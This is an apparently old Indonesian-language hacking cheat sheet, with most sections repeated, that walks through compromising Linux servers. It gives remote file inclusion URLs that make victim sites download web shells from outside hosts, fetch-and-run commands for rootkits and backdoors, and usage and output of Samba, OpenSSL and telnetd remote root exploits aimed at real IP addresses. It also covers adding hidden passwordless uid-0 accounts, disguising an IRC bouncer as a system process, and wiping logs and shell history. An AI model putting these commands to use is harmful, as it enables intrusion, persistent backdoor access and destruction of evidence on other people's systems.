= find |grep name.conf
= echo "zone "i-am.Cmaster4.net" IN {" > named.conf
= echo "type master; > named.conf
= echo "file "/var/named/named.local";" > named.conf
= echo "allow-update { none; };" > named.conf
= echo "};" >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/mail.php
========
pasang bindtty
wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
============
cgi-telnet
mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder .../www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <------td kan kita ada di folder ini
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
kliatan cgi-bin-nya
cd ke folder cgi-bin baru wget ke situ
Contoh:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
kalo bisa lanjut ke
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <-------agar file cgi.pl nya jd file eksekusi
kalo bisa tinggal buka:
www.target.org/cgi-bin/cgi.pl port 7788
============ end
wget www.geocities.com/lifron/psy.tar.gz;
tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========
VHOST
= edit di httpd.conf
= tinggal tambah no
= kong di named.conf
= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf/httpd.conf
= contoh
= echo "
= echo "ServerName www.Cmaster4.net" > httpd.conf
= echo "DocumentRoot /home/iptek/public_html" > httpd.conf
= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" > httpd.conf
= echo "
= ------------------------------
= ------------------------------
= ------------------------------
= find |grep name.conf
= echo "zone "i-am.Cmaster4.net" IN {" > named.conf
= echo "type master; > named.conf
= echo "file "/var/named/named.local";" > named.conf
= echo "allow-update { none; };" > named.conf
= echo "};" >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/mail.php
========
pasang bindtty
wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
============
cgi-telnet
mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder .../www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <------td kan kita ada di folder ini
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
kliatan cgi-bin-nya
cd ke folder cgi-bin baru wget ke situ
Contoh:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
kalo bisa lanjut ke
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <-------agar file cgi.pl nya jd file eksekusi
kalo bisa tinggal buka:
www.target.org/cgi-bin/cgi.pl port 7788
============ end
wget www.geocities.com/lifron/psy.tar.gz;
tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========
TRIK 7 HACKING
Usage: ./sambal [-bBcCdfprsStv] [host]
-b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (defaulllt = 300)
-c connectback ip address
-C max childs for scan/bruttteforce mode (default = 40)
-d bruteforce/scanmode delaaay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
CONTOH:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba
./sambal -b 0 -v
===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attack.
-a password Default password is "chaaangeme".
-p port Default port is 8001.
================
/usr/sbin/adduser httpd
passwd httpd
============
PACTH SAMBA
= root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======
-b
-B
-c
-C
-d
-f force
-p
-r
-s scan mode (random)
-S
-t
-v verbose mode
CONTOH:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba
./sambal -b 0 -v
===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attack.
-a password Default password is "chaaangeme".
-p port Default port is 8001.
================
/usr/sbin/adduser httpd
passwd httpd
============
PACTH SAMBA
= root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======
TRIK 6 HACKING
-----------------
Patch Your Root
-----------------
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
-------------------
Add user dlm Root:
-------------------
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
----------------------------
**add user accses root
----------------------------
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
-----------
Del User
-----------
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
-----------------
--------------------------------------------
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
--------------------------------------------
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- scan massal SSH
./r00t 203.20 -d 2 <--- scan massal FTP
./r00t 203.20 -d 3 <--- scan massal FTP
./r00t 134.7. -d 4
--------------------------------------------
ngeROOT utk OS SCO :
wget www.renjana.com/sco
./sco IP
--------------------------------------------
pasang BackDoor:
1.
id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000
--------------------------------------------
Patch Your Root
-----------------
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
-------------------
Add user dlm Root:
-------------------
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
----------------------------
**add user accses root
----------------------------
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
-----------
Del User
-----------
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
-----------------
--------------------------------------------
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
--------------------------------------------
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- scan massal SSH
./r00t 203.20 -d 2 <--- scan massal FTP
./r00t 203.20 -d 3 <--- scan massal FTP
./r00t 134.7. -d 4
--------------------------------------------
ngeROOT utk OS SCO :
wget www.renjana.com/sco
./sco IP
--------------------------------------------
pasang BackDoor:
1.
id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000
--------------------------------------------
TRIK 5 HACIKNG
=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================
=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh...?
yg terjadi adalah uid dan gid kita adalah 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (Mis: ./apache 202.11159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT
- ./scan No Depan IP Target (Mis: ./scannn 210 21 10)
=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter,
buat password ketik passwd kuntua enter ,
abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita
Changing password for user ganjen
passwd: all authentication tokens updated successfully
berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..
kalo mau dapet acces root ketik :
/usr/sbin/useradd bash -u 0 -d /
abis itu ketik lagi
passwd -d bash
apus jejak
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
udah di ketik semua ? udahh... tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================
=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh...?
yg terjadi adalah uid dan gid kita adalah 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (Mis: ./apache 202.11159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT
- ./scan No Depan IP Target (Mis: ./scannn 210 21 10)
=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter,
buat password ketik passwd kuntua enter ,
abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita
Changing password for user ganjen
passwd: all authentication tokens updated successfully
berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..
kalo mau dapet acces root ketik :
/usr/sbin/useradd bash -u 0 -d /
abis itu ketik lagi
passwd -d bash
apus jejak
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
udah di ketik semua ? udahh... tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
TRIK 4 HACKING
=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell
*hint* : try play with -b
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Langkah Hapus Log I]
=================================================================================================
